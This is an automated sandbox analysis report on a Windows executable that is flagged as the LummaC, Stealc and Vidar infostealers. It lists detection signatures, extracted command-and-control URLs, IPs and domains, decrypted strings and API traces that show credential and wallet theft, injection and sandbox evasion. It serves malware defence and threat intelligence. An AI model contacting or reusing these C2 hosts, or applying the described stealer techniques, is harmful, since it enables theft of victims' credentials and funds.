Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1522636
MD5:	3c9241d0ce97c159d6cfaa49f602fafd
SHA1:	3a0320d338544496cb2ed6952d52e740c7f25d03
SHA256:	a73c4d134f180b9f4047f9be94f3f36b3a2e34469f8c90f70d964778efdc6adc
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar

Yara detected Vidar stealer

.NET source code contains very large array initializations

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://46.8.231.109/c4754d4f680ead72.php	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware

Found malware configuration

Source: 00000000.00000002.2113832701.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869", "https://t.me/jamsemlg"], "Botnet": "514d77849a01ff8ab7dd99d5f0a2e19e"}
Source: 15.2.DBGIJEHIID.exe.39c5570.1.raw.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://46.8.231.109/c4754d4f680ead72.php", "Botnet": "default"}
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["delaylacedmn.site", "possiwreeste.site", "writekdmsnu.site", "agentyanlark.site", "underlinemdsj.site", "commandejorsk.site", "famikyjdiag.site", "bellykmrebk.site"], "Build id": "H8NgCl--"}

Multi AV Scanner detection for domain / URL

Source: chaptermusu.store	Virustotal: Detection: 6%	Perma Link
Source: files.veritas.org.ng	Virustotal: Detection: 5%	Perma Link
Source: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll	Virustotal: Detection: 21%	Perma Link
Source: http://46.8.231.109/c4754d4f680ead72.php=	Virustotal: Detection: 17%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\DBGIJEHIID.exe	ReversingLabs: Detection: 44%
Source: C:\ProgramData\EGDGCGCFHI.exe	ReversingLabs: Detection: 44%
Source: C:\ProgramData\KECBKKEBKE.exe	ReversingLabs: Detection: 44%
Source: C:\Users\userGIEGHJEGHJ.exe	ReversingLabs: Detection: 44%
Source: C:\Users\userIJEGDBGDBF.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fa2ae906657_snd[1].exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fa2afc5abea_vasd[1].exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fa2b049020f_ldnf[1].exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66fa2afc5abea_vasd[1].exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66fa2b049020f_ldnf[1].exe	ReversingLabs: Detection: 44%

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 50%
Source: file.exe	Virustotal: Detection: 52%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\KECBKKEBKE.exe	Joe Sandbox ML: detected
Source: C:\Users\userGIEGHJEGHJ.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\DBGIJEHIID.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66fa2b049020f_ldnf[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66fa2afc5abea_vasd[1].exe	Joe Sandbox ML: detected
Source: C:\Users\userIJEGDBGDBF.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fa2ae906657_snd[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\EGDGCGCFHI.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fa2afc5abea_vasd[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fa2b049020f_ldnf[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: delaylacedmn.site
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: writekdmsnu.site
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: agentyanlark.site
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: bellykmrebk.site
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: underlinemdsj.site
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: commandejorsk.site
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: possiwreeste.site
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: famikyjdiag.site
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: possiwreeste.site
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: TeslaBrowser/5.5
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Screen Resoluton:
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Physical Installed Memory:
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: Workgroup: -
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: H8NgCl--

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,	3_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	3_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,	3_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C526C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	3_2_6C526C80

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.1.169:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.205.129:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.205.129:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.1.169:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49741 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: freebl3.pdb source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2662400593.000000006C58D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3067781475.000000006C7C5000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2665362322.000000006C74F000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000003.00000002.2649143006.0000000038576000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000003.00000002.2640919241.000000002C69B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2665362322.000000006C74F000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2881426007.000000002264B000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2787844428.00000000228AB000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2662400593.000000006C58D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3067781475.000000006C7C5000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,	3_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	3_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	3_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

3_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	10_2_0040F242
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-28h]	10_2_0040F242
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	10_2_0040F940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_0040F940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	10_2_004109FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2EE0190Fh	10_2_00446C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 68677325h	10_2_00446C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00446C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	10_2_0040ED69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then lea edx, dword ptr [eax+edi]	10_2_0040FEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	10_2_0040FEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, ebp	10_2_00422063
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+7Ch]	10_2_00434060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	10_2_00434060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	10_2_00407070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+44h]	10_2_0044716D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	10_2_00440118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+44h]	10_2_0044711B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+7Ch]	10_2_00434136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	10_2_00434136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	10_2_0042A1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_0041518E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh	10_2_00448190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+000004F0h]	10_2_00433240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	10_2_00433240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	10_2_00433240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	10_2_00433240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001B8h]	10_2_0041325D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], dx	10_2_00422260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	10_2_004492C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00425320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	10_2_0041B330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, eax	10_2_0040A3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebp, eax	10_2_0040A3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	10_2_00448390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, ebx	10_2_00430399
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	10_2_00449410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	10_2_00444480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	10_2_004354A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [esi], ax	10_2_0041F552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000110h]	10_2_0041F552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	10_2_00445580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	10_2_00440580
